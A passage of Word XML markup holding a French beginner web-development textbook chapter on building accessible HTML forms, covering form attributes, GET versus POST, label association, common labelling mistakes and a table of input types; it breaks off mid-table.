          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le point de contact entre l'utilisateur et le système : le lieu où l'accessibilité et la sécurité se jouent vraiment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Débutant · Prérequis : chapitre 7</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Construire un formulaire accessible avec étiquettes et groupes de champs.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Choisir le bon type de champ pour chaque donnée attendue.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Utiliser la validation native sans en faire une barrière.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Soigner les messages d'erreur et les états de chargement.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Comprendre pourquoi la validation serveur reste indispensable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Anatomie d'un formulaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un formulaire est un ensemble de champs dont les valeurs sont envoyées à un serveur. Sans JavaScript, il fonctionne déjà : c'est le socle sur lequel on ajoute ensuite du confort. Trois attributs suffisent à le décrire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Le plus petit formulaire utile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&lt;form action="/contact" method="post"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;label for="nom"&gt;Nom&lt;/label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input id="nom" name="nom" type="text" autocomplete="name" required&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;button type="submit"&gt;Envoyer&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.25 — Les attributs de l'élément form</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09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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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370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Valeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>action</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URL de traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/contact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/api/message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>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method</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Méthode HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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get</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (données dans l'URL) ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>post</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>enctype</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Encodage du corps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>multipart/form-data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour les fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>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novalidate</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Désactiver la validation native</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Usage rare, contrôlé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2093"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>autocomplete</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Aide au remplissage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>off</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> place les données dans l'URL : adapté aux recherches et aux filtres, que l'on peut mettre en favori. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> place les données dans le corps : obligatoire pour toute écriture, toute donnée sensible et tout envoi de fichier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Étiquettes : la règle non négociable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque champ doit posséder une étiquette associée. Sans elle, un lecteur d'écran annonce « champ de saisie » sans indiquer quoi saisir, et le clic sur le texte ne place pas le curseur dans le champ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux façons correctes d'associer une étiquette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 Association explicite : recommandée --&gt;</w:t>
        <w:br/>
        <w:t>&lt;label for="email"&gt;Adresse électronique&lt;/label&gt;</w:t>
        <w:br/>
        <w:t>&lt;input id="email" name="email" type="email" autocomplete="email" required&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Champ enveloppé : correct aussi --&gt;</w:t>
        <w:br/>
        <w:t>&lt;label&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Code postal</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;input name="cp" type="text" inputmode="numeric" autocomplete="postal-code"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le texte de l'étiquette doit être visible. Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>placeholder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas une étiquette : il disparaît à la saisie, il est souvent gris et peu contrasté, et il n'est pas toujours annoncé de manière fiable.</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LES CINQ ERREURS D'ÉTIQUETTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>placeholder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> utilisé à la place d'un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;label&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une étiquette qui contient le champ mais pointe aussi ailleurs.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Des étiquettes identiques pour des champs différents (« Nom » deux fois).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une étiquette masquée sans texte alternatif accessible.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="316" w:lineRule="exact"/>
              <w:ind w:left="283" w:hanging="238"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="A63A32"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">• </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un astérisque seul pour signaler un champ obligatoire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 Choisir le bon champ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le type de champ pilote le clavier virtuel sur mobile, la validation native et l'aide à la saisie. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par défaut est presque toujours un aveu de paresse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.26 — Dix types de champs et le clavier qu'ils déclenchent</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177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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Donnée attendue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Clavier mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1771"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Adresse électronique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avec @</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="177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tel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Numéro de téléphone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Pavé numérique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1771"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Adresse web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Avec / et .com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="177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number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="354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Pavé numérique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1771"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3702"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3541"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sélecteur natif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
